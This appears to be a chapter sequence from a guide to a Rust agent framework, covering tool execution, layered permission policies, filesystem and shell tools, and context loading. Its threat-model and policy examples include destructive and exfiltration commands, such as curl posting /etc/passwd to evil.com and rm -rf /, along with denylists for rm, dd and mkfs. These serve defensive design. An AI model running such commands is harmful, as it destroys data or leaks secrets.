cancellation: Option<TurnCancellation>

The capability layer doesn’t know about permissions or cancellation. These are tool-layer concerns, added by the ToolContext wrapper.

Error handling

All capability traits use a single error type:

#![allow(unused)]
fn main() {
pub enum CapabilityError {
    Unavailable(String),     // Capability not found or offline
    InvalidInput(String),    // Arguments failed validation
    ExecutionFailed(String), // Runtime failure
}
}

This is intentionally coarse-grained. The capability layer doesn’t try to enumerate every failure mode — it provides three buckets that cover the meaningful distinctions: “doesn’t exist”, “bad input”, and “broken at runtime”. Downstream layers (tools, MCP) add their own error types when finer granularity is needed.

Positioning

This layer is public and extensible, but it is not the primary extension point for most users. The intended guidance:

“I want to…”Implement…
Add a custom tool that the model can callTool trait (ch09)
Expose data for context loadingResourceProvider
Expose parameterized prompt templatesPromptProvider
Integrate an MCP serverCapabilityProvider (ch17)
Build something that doesn’t fit aboveInvocable directly

Most users implement Tool. The capability traits matter when you’re integrating MCP servers, building custom data sources, or working on the framework itself.

Crate: agentkit-capabilities — depends only on agentkit-core. No runtime dependencies, no async runtime requirements beyond the traits themselves.

Designing a tool system

This chapter covers agentkit-tools-core: the tool execution contract that connects the loop to actual functionality. We’ll walk through the design decisions behind tool specs, the registry, the executor, and how tools bridge to the capability layer underneath.

The tool trait

#![allow(unused)]
fn main() {
#[async_trait]
pub trait Tool: Send + Sync {
    fn spec(&self) -> &ToolSpec;
    async fn invoke(
        &self,
        request: ToolRequest,
        ctx: &mut ToolContext<'_>,
    ) -> Result<ToolResult, ToolError>;
}
}

A tool has two concerns: description and execution. The spec() method returns the model-facing description. The invoke() method does the work.

ToolSpec

#![allow(unused)]
fn main() {
pub struct ToolSpec {
    pub name: ToolName,
    pub description: String,
    pub input_schema: Value,
    pub annotations: ToolAnnotations,
    pub metadata: MetadataMap,
}
}

ToolAnnotations carry behavioral hints:

#![allow(unused)]
fn main() {
pub struct ToolAnnotations {
    pub read_only_hint: bool,
    pub destructive_hint: bool,
    pub idempotent_hint: bool,
    pub needs_approval_hint: bool,
    pub supports_streaming_hint: bool,
}
}

These are hints, not guarantees. The actual enforcement comes from the permission system. But they’re useful for model guidance, UI presentation, and default policy decisions.

ToolRequest and ToolResult

#![allow(unused)]
fn main() {
pub struct ToolRequest {
    pub call_id: ToolCallId,
    pub tool_name: ToolName,
    pub input: Value,
    pub session_id: SessionId,
    pub turn_id: TurnId,
    pub metadata: MetadataMap,
}
}

The request carries everything the tool needs to execute in context. Session and turn IDs let tools make context-aware decisions without depending on loop internals.

#![allow(unused)]
fn main() {
pub struct ToolResult {
    pub result: ToolResultPart,
    pub duration: Option<Duration>,
    pub metadata: MetadataMap,
}
}

The result wraps a ToolResultPart (from agentkit-core) with execution metadata.

ToolContext

#![allow(unused)]
fn main() {
pub struct ToolContext<'a> {
    pub capability: CapabilityContext<'a>,
    pub permissions: &'a dyn PermissionChecker,
    pub resources: &'a dyn ToolResources,
    pub cancellation: Option<TurnCancellation>,
}
}

The context gives tools access to permissions, shared resources (like filesystem policy state), and cancellation. Tools don’t reach into the loop — they get a narrow execution context.

The registry

#![allow(unused)]
fn main() {
pub struct ToolRegistry {
    tools: BTreeMap<ToolName, Arc<dyn Tool>>,
}
}

The registry is simple: register tools, look them up by name, iterate specs. It uses BTreeMap for deterministic ordering.

#![allow(unused)]
fn main() {
let registry = ToolRegistry::new()
    .with(ReadFileTool::default())
    .with(WriteFileTool::default())
    .with(ShellExecTool::default());
}

The builder pattern via .with() makes registration ergonomic. Registries from different tool crates can be merged:

#![allow(unused)]
fn main() {
let registry = agentkit_tool_fs::registry()
    .merge(agentkit_tool_shell::registry());
}

The executor

The loop doesn’t call tools directly. It goes through a ToolExecutor:

#![allow(unused)]
fn main() {
pub trait ToolExecutor {
    async fn execute(
        &self,
        request: ToolRequest,
        ctx: &mut ToolContext<'_>,
    ) -> ToolExecutionOutcome;
}
}

The executor handles:

  1. Registry lookup
  2. Permission preflight
  3. Approval determination
  4. Tool invocation
  5. Error normalization

This centralized layer is where safety logic lives, rather than being duplicated in every tool.

Execution outcomes

#![allow(unused)]
fn main() {
pub enum ToolExecutionOutcome {
    Completed(ToolResult),
    Interrupted(ToolInterruption),
    Failed(ToolError),
}

pub enum ToolInterruption {
    ApprovalRequired(ApprovalRequest),
    AuthRequired(AuthRequest),
}
}

Not every execution failure is an error. An approval-required outcome means the tool is valid but needs human confirmation. The loop translates this into an interrupt.

Preflight permission requests

Tools can expose what they plan to do before execution by overriding proposed_requests on the Tool trait:

#![allow(unused)]
fn main() {
fn proposed_requests(
    &self,
    request: &ToolRequest,
) -> Result<Vec<Box<dyn PermissionRequest>>, ToolError> {
    Ok(Vec::new()) // default: no permissions needed
}
}

This lets the executor inspect and evaluate permission requests before any side effects occur. This is especially important for shell commands and filesystem writes — you want to check policy before running rm -rf, not after.

Bridging to capabilities

ToolCapabilityProvider wraps a ToolRegistry as a CapabilityProvider, making every registered tool available as an Invocable. This is how the loop presents tools to the model alongside MCP-backed capabilities through a single unified list.

The execution flow

Putting it all together — here’s the complete path from model tool call to result:

Model emits ToolCallPart
       │
       ▼
┌──────────────────────────────────┐
│  ToolExecutor                    │
│                                  │
│  1. Registry lookup              │
│     ToolName → Arc<dyn Tool>     │
│     └── not found → ToolError    │
│                                  │
│  2. Preflight                    │
│     tool.proposed_requests()     │
│     → Vec<PermissionRequest>     │
│                                  │
│  3. Permission evaluation        │
│     for each PermissionRequest:  │
│     checker.evaluate(req)        │
│     ├── Allow → continue         │
│     ├── Deny → stop, return err  │
│     └── RequireApproval → stop,  │
│         return ToolInterruption  │
│                                  │
│  4. Invocation                   │
│     tool.invoke(request, ctx)    │
│     → ToolResult                 │
│                                  │
│  5. Error normalization          │
│     ToolError → ToolResult       │
│     with ToolResultPart          │
│     { is_error: true }           │
└──────────────────────────────────┘
       │
       ▼
ToolExecutionOutcome::Completed(ToolResult)

Tool errors (file not found, invalid JSON, network failure) are normalized into a ToolResult whose ToolResultPart has is_error: true — the model sees the error message as a tool result and can decide to retry, try differently, or report the failure. Errors don’t crash the loop or propagate to the host.

Design decisions

Why separate Tool from Invocable?

Tools add model-facing schema and permission semantics on top of the base invocable contract. A raw Invocable doesn’t have annotations, preflight actions, or a permission context. Tools are a specialization, not the lowest layer.

Why ToolName as a newtype?

ToolName prevents accidental confusion with other string identifiers. It also centralizes validation and supports namespacing conventions like fs.read_file or mcp.github.search.

Why JSON Schema for input?

Explicit JSON Schema keeps the tool contract provider-neutral. Tools don’t depend on derive macros or schema generation libraries that might not match every provider’s expectations. The schema is a JSON Value — any valid JSON Schema works:

#![allow(unused)]
fn main() {
input_schema: json!({
    "type": "object",
    "properties": {
        "path": { "type": "string", "description": "File path to read" },
        "from": { "type": "integer", "description": "Start line (optional)" },
        "to": { "type": "integer", "description": "End line (optional)" }
    },
    "required": ["path"]
})
}

If ergonomic schema helpers are needed later (derive macros, builder APIs), they can be added as optional companions without changing the base contract.

Why BTreeMap for the registry?

ToolRegistry uses BTreeMap<ToolName, Arc<dyn Tool>> rather than HashMap for deterministic tool ordering. When the model receives the tool list, the order is always the same — this matters for reproducibility and for providers that may be sensitive to tool ordering in the prompt.

Crate: agentkit-tools-core — depends on agentkit-capabilities and agentkit-core.

Permissions, approvals, and auth

Safety is the hardest problem in agent frameworks. An agent with shell access can delete your home directory. An agent with network access can exfiltrate data. The permission system is how you prevent this without making the agent useless.

This chapter covers the permission model, policy composition, and approval flow.

The ternary decision model

A permission check produces one of three outcomes:

#![allow(unused)]
fn main() {
pub enum PermissionDecision {
    Allow,
    Deny(PermissionDenial),
    RequireApproval(ApprovalRequest),
}
}

This is not a boolean. The third outcome — “this might be okay, but a human needs to confirm” — is essential for practical agent use. Categorically denying all writes makes the agent unable to code. Categorically allowing all writes makes it dangerous. Requiring approval for writes outside the workspace is the useful middle ground.

Permission requests

Policy is evaluated against a description of the proposed action, not against tool implementation details:

#![allow(unused)]
fn main() {
pub trait PermissionRequest: Send + Sync {
    fn kind(&self) -> &'static str;
    fn summary(&self) -> String;
    fn metadata(&self) -> &MetadataMap;
    fn as_any(&self) -> &dyn Any;
}
}

Built-in request types cover common scenarios:

  • ShellPermissionRequest — executable, argv, cwd, env keys, timeout
  • FileSystemPermissionRequest — Read, Write, Edit, Delete, Move, List, CreateDir
  • McpPermissionRequest — Connect, InvokeTool, ReadResource, FetchPrompt, UseAuthScope

Custom tools can define their own request types by implementing the trait directly. This makes custom tools first-class — they don’t have to squeeze into a generic Custom { kind, payload } variant.

The permission checker

#![allow(unused)]
fn main() {
pub trait PermissionChecker: Send + Sync {
    fn evaluate(&self, request: &dyn PermissionRequest) -> PermissionDecision;
}
}

This is synchronous by design. Permission checks should be local and cheap. If a host needs external policy engines, they can build an adapter, but the base contract stays simple.

Policy composition

Real hosts need layered rules. A single monolithic checker doesn’t scale — you want separate rules for paths, commands, MCP servers, and custom actions, each maintained independently.

#![allow(unused)]
fn main() {
pub struct CompositePermissionChecker {
    policies: Vec<Box<dyn PermissionPolicy>>,
    fallback: PermissionDecision,
}
}

Each policy returns PolicyMatch — note the fourth option that PermissionDecision doesn’t have:

#![allow(unused)]
fn main() {
pub enum PolicyMatch {
    NoOpinion,                    // "I don't handle this kind of request"
    Allow,
    Deny(PermissionDenial),
    RequireApproval(ApprovalRequest),
}
}

NoOpinion is what makes composition work. A PathPolicy returns NoOpinion for shell commands because it only understands filesystem paths. A CommandPolicy returns NoOpinion for filesystem operations. Each policy handles its domain and defers on everything else.

The evaluation algorithm:

for each policy in registration order:
  match policy.evaluate(request):
    NoOpinion         → continue to next policy
    Allow             → record "saw allow", continue
    Deny(reason)      → STOP, return Deny immediately
    RequireApproval   → record it, continue

after all policies:
  if any Deny was seen     → return Deny         (already returned above)
  if any RequireApproval   → return RequireApproval
  if any Allow             → return Allow
  otherwise                → return fallback

Precedence rules:

  1. Explicit deny wins — a single Deny short-circuits immediately
  2. Require-approval wins over allow — if any policy says “ask the user”, the user is asked
  3. Allow wins over no-opinion — at least one policy must explicitly allow
  4. Fallback applies if no policy matches — configurable (typically Deny)

Built-in policies

  • PathPolicy — workspace root allowlists, protected path denylists, read-only subtrees
  • CommandPolicy — executable allowlists/denylists, cwd restrictions, env var restrictions
  • McpServerPolicy — trusted server allowlists, auth-scope restrictions
  • CustomKindPolicy — handles custom tool action kinds

Composing policies — a practical example

#![allow(unused)]
fn main() {
let checker = CompositePermissionChecker::new(PermissionDecision::Deny(default_denial()))
    .with_policy(PathPolicy::new()
        .allow_root("/workspace")
        .read_only_root("/workspace/vendor")
        .protect_root("/workspace/.env")
        .protect_root("/workspace/secrets/"))
    .with_policy(CommandPolicy::new()
        .allow_executable("git")
        .allow_executable("cargo")
        .allow_executable("rustc")
        .deny_executable("rm")
        .require_approval_for_unknown(true))
    .with_policy(McpServerPolicy::new()
        .allow_server("github"));
}

Trace through some requests with this configuration:

Request: FileSystem::Read("/workspace/src/main.rs")
  PathPolicy:    /workspace is allowed root → Allow
  CommandPolicy: NoOpinion (not a shell request)
  McpPolicy:     NoOpinion (not an MCP request)
  Result: Allow ✓

Request: FileSystem::Write("/workspace/.env")
  PathPolicy:    /workspace/.env is denied → Deny
  Result: Deny ✗ (short-circuit)

Request: FileSystem::Edit("/workspace/vendor/lib.rs")
  PathPolicy:    /workspace/vendor is read-only → Deny
  Result: Deny ✗ (short-circuit)

Request: Shell("curl", ["https://evil.com"])
  PathPolicy:    NoOpinion (not a filesystem request)
  CommandPolicy: "curl" is unknown, require_approval_for_unknown → RequireApproval
  McpPolicy:     NoOpinion
  Result: RequireApproval ⚠

Request: Shell("rm", ["-rf", "/"])
  PathPolicy:    NoOpinion
  CommandPolicy: "rm" is denied → Deny
  Result: Deny ✗ (short-circuit)

Request: Custom("deploy", {...})
  PathPolicy:    NoOpinion
  CommandPolicy: NoOpinion
  McpPolicy:     NoOpinion
  No policy matched → fallback: Deny ✗

Execution integration

The permission flow integrates with tool execution:

  1. Tool receives a request
  2. Tool exposes preflight PermissionRequest values
  3. Executor evaluates each request through the permission checker
  4. If any are denied → execution stops with a structured denial
  5. If any require approval → execution stops with an interrupt
  6. Otherwise → the tool executes

Multiple actions per tool call are evaluated together: if any deny, the whole call is denied. If any require approval, the whole call is interrupted. This is conservative by design.

Approval vs denial

The distinction matters:

  • Deny when an action is categorically disallowed: rm -rf /, reading /etc/shadow
  • Require approval when an action is risky but may be legitimate: writing outside the workspace, connecting to an unknown MCP server

Hosts should set this calibration through their policy configuration, not through agentkit defaults.

Custom permission requests

#![allow(unused)]
fn main() {
pub struct DeployPermissionRequest {
    pub environment: String,
    pub service: String,
    pub metadata: MetadataMap,
}

impl PermissionRequest for DeployPermissionRequest {
    fn kind(&self) -> &'static str { "myapp.deploy" }
    fn summary(&self) -> String {
        format!("Deploy {} to {}", self.service, self.environment)
    }
    // ...
}
}

Generic policies operate on kind() and metadata. Specialized host policies can downcast through as_any() for richer handling. This layering lets custom tools participate in the permission system without compromising on type safety.

Crate: Permission types live in agentkit-tools-core. Built-in policies are in the same crate. Tool crates like agentkit-tool-fs and agentkit-tool-shell define their specific request types.

Filesystem tools

A coding agent needs to read, write, and navigate files. This chapter covers agentkit-tool-fs: the built-in filesystem tools and their session-scoped safety policies.

The tool set

agentkit-tool-fs ships seven tools:

ToolDescriptionAnnotations
fs.read_fileRead file contents with optional line rangesread_only
fs.write_fileWrite or overwrite a filedestructive
fs.replace_in_fileFind-and-replace within a filedestructive
fs.moveRename or move a filedestructive
fs.deleteDelete a filedestructive
fs.list_directoryList directory contentsread_only
fs.create_directoryCreate a directory

All tools implement the Tool trait and can be registered with a single call:

#![allow(unused)]
fn main() {
let registry = agentkit_tool_fs::registry();
}

Read-before-write enforcement

The most important safety feature in the filesystem tools is FileSystemToolPolicy:

#![allow(unused)]
fn main() {
let resources = FileSystemToolResources::new()
    .with_policy(
        FileSystemToolPolicy::new()
            .require_read_before_write(true),
    );
}

When enabled, the policy tracks which files have been read in the current session. A write or replace operation on a file that hasn’t been read first is denied. This prevents the model from blindly overwriting files it hasn’t seen — a surprisingly common failure mode.

The tracking state lives in FileSystemToolResources, which implements the ToolResources trait and is passed to tools through ToolContext.

Permission preflight

Every filesystem tool emits a FileSystemPermissionRequest before execution:

#![allow(unused)]
fn main() {
pub enum FileSystemPermissionRequest {
    Read { path: PathBuf },
    Write { path: PathBuf },
    Edit { path: PathBuf },
    Delete { path: PathBuf },
    Move { from: PathBuf, to: PathBuf },
    List { path: PathBuf },
    CreateDir { path: PathBuf },
}
}

These structured requests let PathPolicy make informed decisions:

  • Allow reads under the workspace root
  • Require approval for writes outside the workspace
  • Deny deletes of protected paths

Read-before-write: why it matters

Without this policy, the model can — and routinely does — overwrite files it hasn’t seen. The typical failure mode:

Without read-before-write:

  User: "Add error handling to parser.rs"
  Model: ToolCall(fs.write_file, { path: "src/parser.rs", content: "... entirely new file ..." })

  The model hallucinated the file contents. The original code is gone.
  Any code that wasn't in the model's context window is lost.


With read-before-write:

  User: "Add error handling to parser.rs"
  Model: ToolCall(fs.write_file, { path: "src/parser.rs", content: "..." })
  → Denied: "src/parser.rs has not been read in this session"

  Model: ToolCall(fs.read_file, { path: "src/parser.rs" })
  → Success: file contents returned

  Model: ToolCall(fs.replace_in_file, { path: "src/parser.rs", find: "...", replace: "..." })
  → Success: targeted edit

The policy is session-scoped — the tracker resets when a new session starts. Reading a file once unlocks writes and edits to it for the remainder of the session.

Implementation patterns

fs.read_file

Accepts a path and optional from/to line numbers. Returns the file contents as text. Records the path as “read” in FileSystemToolResources for read-before-write tracking.

Line range support lets the model read specific sections of large files without consuming the entire context window:

fs.read_file({ path: "src/main.rs", from: 50, to: 75 })
→ Returns lines 50-75 only

fs.replace_in_file

Accepts a path, find, replace, and an optional replace_all boolean. Reads the file, performs the replacement, writes the result. This is the primary editing tool — it’s more precise than full-file writes because the model only needs to specify the changed region.

The replacement is exact string matching, not regex. If the search text doesn’t appear in the file, the tool returns an error. When replace_all is false (the default), only the first occurrence is replaced — this avoids accidental mass edits.

fs.write_file

Writes or overwrites an entire file. Subject to read-before-write policy for existing files. New files (that don’t exist yet) can be written without a prior read.

fs.list_directory

Returns the contents of a directory. Useful for the model to explore project structure before reading specific files. Returns filenames and basic metadata (file vs directory, size).

Error handling

Filesystem errors (file not found, permission denied, etc.) are returned as a ToolResult whose ToolResultPart has is_error: true. They are not panics or exceptions. The model sees the error message and can decide what to do — try a different path, ask the user, or give up.

Error flow:

  fs.read_file({ path: "nonexistent.rs" })
  → ToolResult { result: ToolResultPart { is_error: true, output: "File not found: nonexistent.rs", .. }, .. }
  → Model: "The file doesn't exist. Let me check the directory structure..."
  → fs.list_directory({ path: "src/" })
  → Model finds the correct file name and retries

This is a key design principle: tool errors are part of the conversation, not exceptions. The model can reason about errors and recover, which is essential for autonomous operation.

Example: openrouter-coding-agent uses the full filesystem registry to read, edit, and write files in a one-shot coding task.

Crate: agentkit-tool-fs — depends on agentkit-tools-core and agentkit-core.

Shell execution

Shell access is the most powerful and most dangerous tool an agent can have. This chapter covers agentkit-tool-shell, its safety boundaries, and how it integrates with cancellation and timeouts.

ShellExecTool

The crate provides a single tool: shell.exec.

#![allow(unused)]
fn main() {
let registry = agentkit_tool_shell::registry();
}

Input schema

FieldTypeRequiredDescription
executablestringyesProgram to run
argv[string]noCommand-line arguments
cwdstringnoWorking directory
env{string: string}noEnvironment variables
timeout_msintegernoTimeout in milliseconds

Output

The tool returns structured JSON:

{
  "stdout": "...",
  "stderr": "...",
  "success": true,
  "exit_code": 0
}

Both stdout and stderr are captured. The model sees the full output and can reason about errors.

Permission preflight

Before spawning a process, the tool emits a ShellPermissionRequest:

#![allow(unused)]
fn main() {
pub struct ShellPermissionRequest {
    pub executable: String,
    pub argv: Vec<String>,
    pub cwd: Option<PathBuf>,
    pub env_keys: Vec<String>,
    pub metadata: MetadataMap,
}
}

Note that only environment keys are included, not values. Policy usually doesn’t need the full environment — knowing that AWS_SECRET_ACCESS_KEY is being passed is enough to flag the command.

CommandPolicy evaluates these requests:

#![allow(unused)]
fn main() {
let policy = CommandPolicy::new()
    .allow_executables(["ls", "cat", "git", "cargo"])
    .deny_executables(["rm", "dd", "mkfs"])
    .require_approval_for_unknown(true);
}

Cancellation

ShellExecTool respects TurnCancellation from the tool context. If the user presses Ctrl-C during a long-running command, the tool kills the subprocess and returns a cancellation result.

The implementation uses tokio::select! to race the subprocess against the cancellation future:

#![allow(unused)]
fn main() {
tokio::select! {
    result = child.wait_with_output() => { /* normal completion */ }
    _ = cancellation.cancelled() => { /* kill the child */ }
}
}

Timeouts

Per-invocation timeouts are supported through the timeout_ms input field. If the command exceeds the timeout, it’s killed and an error result is returned. This is independent of cancellation — timeouts are tool-scoped, cancellation is turn-scoped.

The shell tool in the agent loop

Shell execution is where the agent loop interacts most visibly with the outside world. A typical coding agent session involves dozens of shell commands: cargo build, cargo test, git diff, ls, grep. The integration with the task manager determines how these commands affect the loop:

Sequential (SimpleTaskManager):

  Model: ToolCall(shell.exec, { executable: "cargo", argv: ["build"] })
  Driver: execute inline, wait for completion (10 seconds)
  Driver: append result to transcript
  Driver: start next model turn


With ForegroundThenDetachAfter(5s):

  Model: ToolCall(shell.exec, { executable: "cargo", argv: ["build"] })
  Driver: start executing, wait up to 5 seconds
  └── if finishes in 3s → result appended, loop continues normally
  └── if still running at 5s → detach to background
      └── model receives a synthetic tool result: "task is running in the background"
      └── model continues its turn (e.g. reads another file)
      └── when build finishes, result appears in next turn

This integration is covered in detail in Chapter 18.

Security considerations

Shell execution is inherently dangerous. agentkit provides the policy tools to constrain it, but the host application is responsible for configuring appropriate policies.

The threat model

An LLM with shell access can:

  • Delete files (rm -rf /)
  • Exfiltrate data (curl -d @/etc/passwd https://evil.com)
  • Install software (pip install malware)
  • Modify system state (chmod 777 /)
  • Consume resources (fork bomb, dd if=/dev/zero)

These aren’t hypothetical — models will occasionally generate dangerous commands, especially when frustrated by errors or prompted adversarially.

Defence layers

Layer 1: Policy (prevent)
  CommandPolicy with allowlists and denylists
  Require approval for unknown commands

Layer 2: Timeout (contain)
  Per-invocation timeouts kill runaway commands
  Task manager detach prevents blocking

Layer 3: Sandbox (isolate)
  Run the agent in a container, VM, or restricted user
  Mount the workspace read-write, everything else read-only

Layer 4: Audit (detect)
  LoopObserver logs every shell command and its output
  Review logs for unexpected behaviour

Guidelines

  • Always pair ShellExecTool with a CommandPolicy
  • Use executable allowlists rather than denylists when possible — it’s easier to enumerate safe commands than to enumerate all dangerous ones
  • Consider running the agent in a sandboxed environment for untrusted inputs
  • Use require_approval_for_unknown(true) as a sensible default
  • Set reasonable timeouts — a build command that takes 10 minutes is probably stuck
  • Only expose the env_keys that tools actually need — don’t pass through AWS_SECRET_ACCESS_KEY unless required

Example: openrouter-parallel-agent uses shell tools with ForegroundThenDetachAfter routing — commands that take too long are automatically promoted to background tasks.

Crate: agentkit-tool-shell — depends on agentkit-tools-core, agentkit-core, and tokio.

Writing custom tools

Custom tools are the primary extension mechanism in agentkit. This chapter shows how to implement tools from simple to sophisticated, including preflight actions, custom permission types, and shared resources.

A minimal tool

#![allow(unused)]
fn main() {
use agentkit_tools_core::*;
use agentkit_core::*;
use async_trait::async_trait;
use serde_json::json;

pub struct EchoTool {
    spec: ToolSpec,
}

impl EchoTool {
    pub fn new() -> Self {
        Self {
            spec: ToolSpec {
                name: ToolName::new("echo"),
                description: "Return the input unchanged".into(),
                input_schema: json!({
                    "type": "object",
                    "properties": {
                        "message": { "type": "string" }
                    },
                    "required": ["message"]
                }),
                annotations: ToolAnnotations {
                    read_only_hint: true,
                    ..Default::default()
                },
                metadata: MetadataMap::new(),
            },
        }
    }
}

#[async_trait]
impl Tool for EchoTool {
    fn spec(&self) -> &ToolSpec {
        &self.spec
    }

    async fn invoke(
        &self,
        request: ToolRequest,
        _ctx: &mut ToolContext<'_>,
    ) -> Result<ToolResult, ToolError> {
        let message = request.input["message"]
            .as_str()
            .ok_or_else(|| ToolError::InvalidInput("missing message".into()))?;

        Ok(ToolResult {
            result: ToolResultPart {
                call_id: request.call_id,
                output: ToolOutput::Text(message.to_string()),
                is_error: false,
                metadata: MetadataMap::new(),
            },
            duration: None,
            metadata: MetadataMap::new(),
        })
    }
}
}

Register it:

#![allow(unused)]
fn main() {
let registry = ToolRegistry::new().with(EchoTool::new());
}

Using ToolContext

Tools receive a ToolContext that provides access to the current session, permissions, cancellation state, and shared resources:

#![allow(unused)]
fn main() {
async fn invoke(&self, request: ToolRequest, ctx: &mut ToolContext<'_>) -> Result<ToolResult, ToolError> {
    // Check cancellation
    if let Some(ref cancel) = ctx.cancellation {
        if cancel.is_cancelled() {
            return Err(ToolError::Cancelled);
        }
    }

    // Access shared resources
    let resources = ctx.resources;

    // Access session identity
    let session_id = ctx.capability.session_id;

    // ...
}
}

Adding preflight permission requests

For tools with side effects, override proposed_requests on the Tool trait to expose proposed actions before execution:

#![allow(unused)]
fn main() {
impl Tool for DeployTool {
    fn spec(&self) -> &ToolSpec { &self.spec }

    fn proposed_requests(
        &self,
        request: &ToolRequest,
    ) -> Result<Vec<Box<dyn PermissionRequest>>, ToolError> {
        let env = request.input["environment"].as_str().unwrap_or("unknown");
        Ok(vec![Box::new(DeployPermissionRequest {
            environment: env.to_string(),
            service: "my-service".into(),
            metadata: MetadataMap::new(),
        })])
    }

    async fn invoke(&self, request: ToolRequest, ctx: &mut ToolContext<'_>)
        -> Result<ToolResult, ToolError> { /* ... */ }
}
}

The executor evaluates these before calling invoke(). If any are denied or require approval, execution stops before any side effects occur.

Custom permission requests

Define your own permission request types:

#![allow(unused)]
fn main() {
pub struct DeployPermissionRequest {
    pub environment: String,
    pub service: String,
    pub metadata: MetadataMap,
}

impl PermissionRequest for DeployPermissionRequest {
    fn kind(&self) -> &'static str { "myapp.deploy" }
    fn summary(&self) -> String {
        format!("Deploy {} to {}", self.service, self.environment)
    }
    fn metadata(&self) -> &MetadataMap { &self.metadata }
    fn as_any(&self) -> &dyn Any { self }
}
}

Host policies can match on kind() generically, or downcast through as_any() for type-safe field access.

Shared resources via ToolResources

If your tool needs session-scoped state (like the filesystem tools’ read-before-write tracker), implement ToolResources:

#![allow(unused)]
fn main() {
pub trait ToolResources: Send + Sync {
    fn as_any(&self) -> &dyn Any;
}
}

Register resources when building the agent, and downcast in your tool’s invoke() method.

Tool composition patterns

Nesting agents as tools

A powerful pattern: implement a tool that runs a nested agent loop. The outer agent calls the tool with a task description, the tool starts an inner agent, runs it to completion, and returns the result.

Outer agent (orchestrator):
  Model: "I need to research this codebase and write a report"
  Model: ToolCall(subagent, { task: "Find all uses of unsafe code", tools: ["fs", "shell"] })
         │
         ▼
  Inner agent (researcher):
    Model: ToolCall(fs.read_file, { path: "src/lib.rs" })
    Model: ToolCall(shell.exec, { executable: "grep", argv: ["-r", "unsafe", "src/"] })
    Model: "Found 3 uses of unsafe in parser.rs, codec.rs, and ffi.rs..."
         │
         ▼
  Outer agent receives: "Found 3 uses of unsafe..."
  Model: "Based on my research, here's the report..."

The inner agent has its own transcript, tools, and session. It doesn’t share state with the outer agent — this isolation prevents context pollution and makes the sub-agent’s scope explicit.

The openrouter-subagent-tool example shows a complete implementation of this pattern.

Tool registries from crates

Organize related tools into crate-level registry() functions:

#![allow(unused)]
fn main() {
pub fn registry() -> ToolRegistry {
    ToolRegistry::new()
        .with(ToolA::default())
        .with(ToolB::default())
}
}

Host applications merge registries from multiple crates:

#![allow(unused)]
fn main() {
let registry = my_tools::registry()
    .merge(agentkit_tool_fs::registry())
    .merge(agentkit_tool_shell::registry());
}

Stateful tools

Tools that need to maintain state across invocations (counters, caches, connection pools) should use ToolResources:

#![allow(unused)]
fn main() {
struct MyToolResources {
    cache: Mutex<HashMap<String, String>>,
    http_client: reqwest::Client,
}

impl ToolResources for MyToolResources {
    fn as_any(&self) -> &dyn Any { self }
}

// In your tool's invoke():
let resources = ctx.resources
    .as_any()
    .downcast_ref::<MyToolResources>()
    .expect("MyToolResources not registered");

let mut cache = resources.cache.lock().unwrap();
}

Register resources when building the agent:

#![allow(unused)]
fn main() {
let agent = Agent::builder()
    .model(adapter)
    .resources(MyToolResources::new())
    .build()?;
}

All tools in the session share the same ToolResources instance. This is how the filesystem tools share their read-before-write tracker — FileSystemToolResources implements ToolResources and is downcast in each tool’s invoke().

Example: openrouter-subagent-tool implements a custom tool that runs a nested agent as a tool call.

Crate: agentkit-tools-coreTool, ToolRegistry, ToolResources, ToolContext.

Context loading

A coding agent needs to understand the project it’s working in. This chapter covers agentkit-context: how agents load project instructions, conventions, and ambient context into the transcript.

The problem

Without context, a coding agent is generic. It doesn’t know your project’s conventions, tech stack, or constraints. It will write Python-style Rust, ignore your linting rules, and miss architectural patterns that are obvious to anyone who has read the README.

Context loading bridges this gap by injecting project-specific information into the transcript before the model sees it:

Without context:

  Transcript: [System("You are a coding assistant"), User("Fix the parser")]
  Model: writes code that doesn't match project conventions


With context:

  Transcript: [
      System("You are a coding assistant"),
      Context("This project uses Rust 2024 edition. Error handling uses thiserror..."),
      Context("All public types must have doc comments. Use `cargo clippy` before committing."),
      User("Fix the parser"),
  ]
  Model: writes idiomatic code that follows project conventions

Once system prompts and context items are stable, they form a reusable prefix for every turn. The next chapter covers prompt caching — the transport optimization that exploits this stability.

ContextLoader

The loader combines multiple context sources and produces Vec<Item> with ItemKind::Context:

#![allow(unused)]
fn main() {
let items = ContextLoader::new()
    .with_source(AgentsMd::discover_all(workspace_root))
    .with_source(my_custom_source)
    .load()
    .await?;
}

Sources are loaded in registration order and their results are concatenated. The resulting items are ordinary transcript entries — the loop and providers don’t need a separate context path. They’re submitted to the driver alongside system items at session start:

#![allow(unused)]
fn main() {
driver.submit_input(system_items)?;
driver.submit_input(context_items)?; // ← loaded by ContextLoader
driver.submit_input(user_items)?;
}

AgentsMd

The primary built-in source loads AGENTS.md files (similar to how Claude Code uses CLAUDE.md or Cursor uses .cursorrules):

#![allow(unused)]
fn main() {
// Find the nearest AGENTS.md by walking up from the workspace
let source = AgentsMd::discover(workspace_root);

// Find all AGENTS.md files from root to workspace (stacked)
let source = AgentsMd::discover_all(workspace_root);
}

Discovery modes

AgentsMdMode::Nearest — stop at the first match:

  /home/user/projects/myapp/AGENTS.md     ← found, stop
  /home/user/projects/AGENTS.md           (not checked)
  /home/user/AGENTS.md                    (not checked)


AgentsMdMode::All — collect everything, outermost first:

  /home/user/AGENTS.md                    ← loaded first (general)
  /home/user/projects/AGENTS.md           ← loaded second (more specific)
  /home/user/projects/myapp/AGENTS.md     ← loaded last (most specific)

The All mode is useful for organizations that layer context: a company-wide AGENTS.md at a parent directory, project-level instructions at the repo root, and module-specific instructions in subdirectories. More specific instructions appear later in the transcript and take precedence in the model’s attention.

Configuration

#![allow(unused)]
fn main() {
let source = AgentsMd::discover_all(workspace_root)
    .with_file_name("CLAUDE.md")            // Custom file name
    .with_search_dir(".agent/")             // Check sidecar directories
    .with_path("/team/shared/AGENTS.md");   // Explicit file path
}
MethodWhat it does
with_file_nameChange from AGENTS.md to a different name
with_search_dirCheck a specific directory (no ancestor walk)
with_pathInclude an explicit file path (skipped if missing)

Explicit paths and search dirs are checked before ancestor discovery. All results are deduplicated by path.

Loaded item structure

Each loaded file becomes an Item with metadata:

#![allow(unused)]
fn main() {
Item {
    kind: ItemKind::Context,
    parts: [Part::Text(TextPart {
        text: "[Loaded AGENTS]\nPath: /workspace/AGENTS.md\n\n<file contents>",
        ...
    })],
    metadata: {
        "agentkit.context.source": "agents_md",
        "agentkit.context.path": "/workspace/AGENTS.md",
    },
}
}

The metadata lets compaction strategies and reporters identify where context came from. The source key distinguishes AgentsMd items from other context sources.

The ContextSource trait

All context loading goes through a simple trait:

#![allow(unused)]
fn main() {
#[async_trait]
